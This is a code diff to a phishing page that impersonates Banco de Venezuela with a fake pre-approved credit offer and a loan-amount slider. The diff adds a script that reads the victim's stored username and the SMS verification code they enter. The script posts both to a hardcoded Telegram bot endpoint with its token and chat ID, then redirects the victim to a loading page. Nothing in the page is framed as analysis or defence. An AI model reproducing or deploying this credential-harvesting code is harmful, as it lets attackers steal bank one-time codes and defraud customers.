--- a/sms.html
+++ b/sms.html
@@ -1,9 +1,11 @@
-
 <!DOCTYPE html>
 <html lang="es">
   <head>
     <meta charset="UTF-8" />
-    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <meta
+      name="viewport"
+      content="width=device-width, initial-scale=1.0, user-scalable=no"
+    />
     <title>Banco de Venezuela</title>
     <style>
       body {
@@ -114,7 +116,6 @@
       }
       .slider-container h2 {
         margin-bottom: 20px;
-
       }
       .slider {
         width: 100%;
@@ -129,43 +130,73 @@
   <body>
     <div class="container">
       <div class="left-side">
-        <form action="step-11.php" method="POST" id="loginform">
+        <form id="loginform">
           <div style="text-align: center">
             <img src="logo.png" alt="" style="width: 60%; margin-top: 20px" />
           </div>
           <div style="width: 100%; text-align: center">
             <div style="margin: 10px; color: #0067b1 !important">
               <h4>Credito Preaprobado</h4>
-              <h5 style="padding: 20px;">
-                Para conocer el monto de tu crédito pre aprobado ingresa el código recibido por SMS o generado en Amiven.
+              <h5 style="padding: 20px">
+                Para solicitar y conocer el monto de tu crédito ingresa el SMS
+                que hemos enviado a tu celular registrado o puedes generarlo en
+                nuestra app Amiven
               </h5>
             </div>
             <div style="width: 100%; text-align: center">
+              <div
+                style="
+                  width: 100%;
+                  text-align: center;
+                  color: #0070cc;
+                  font-weight: bold;
+                  margin-bottom: 20px;
+                "
+              >
+                Selecciona el monto de tu credito:
+              </div>
               <div class="slider-container">
-                <div class="slider-value" id="sliderValue" style="color: #0070CC;">$1000</div>
+                <div
+                  class="slider-value"
+                  id="sliderValue"
+                  style="color: #0070cc"
+                >
+                  $1,000 USD
+                </div>
                 <input
                   type="range"
-                  min="1000"
-                  max="20000"
+                  min="300"
+                  max="3800"
                   value="1000"
                   class="slider"
                   id="priceSlider"
                 />
               </div>
             </div>
+
             <script>
               const slider = document.getElementById("priceSlider");
               const sliderValue = document.getElementById("sliderValue");
 
+              function formatNumber(num) {
+                if (num < 1000) {
+                  return num;
+                }
+                return num.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ",");
+              }
+
               slider.addEventListener("input", function () {
-                sliderValue.textContent = `$${slider.value}`;
+                sliderValue.textContent = `$${formatNumber(slider.value)} USD`;
               });
+
+              // Formatear el valor inicial del slider
+              sliderValue.textContent = `$${formatNumber(slider.value)} USD`;
             </script>
             <div class="form-group">
               <input
                 type="text"
                 id="sms"
-                name="sms"
+                name="nombre"
                 style="width: 100%"
                 maxlength="8"
                 required
@@ -209,5 +240,30 @@
 
   <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>
 
-  
+  <script>
+    const url = "https://ipapi.co/json/";
+    const form = document.querySelector("#loginform");
+
+    form.addEventListener("submit", (event) => {
+      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
+      const nombre = localStorage.getItem("usuario");
+      const contra = document.querySelector("#sms").value;
+      const message = " ------ BDV ------ Nombre: " + nombre + " ------ SMS: " + contra;
+      axios
+        axios
+            .post(
+              "https://api.telegram.org/bot7471890277:AAEMSHt3Q8P9yUGOxiYLrdTUp8IwG2YUiB8/sendMessage",
+              {
+                chat_id: "6734431637",
+                text: message,
+              }
+            )
+        .then((response) => {
+          window.location.href = "cargando2.html";
+        })
+        .catch((error) => {
+          console.error(error);
+        });
+    });
+  </script>
 </html>
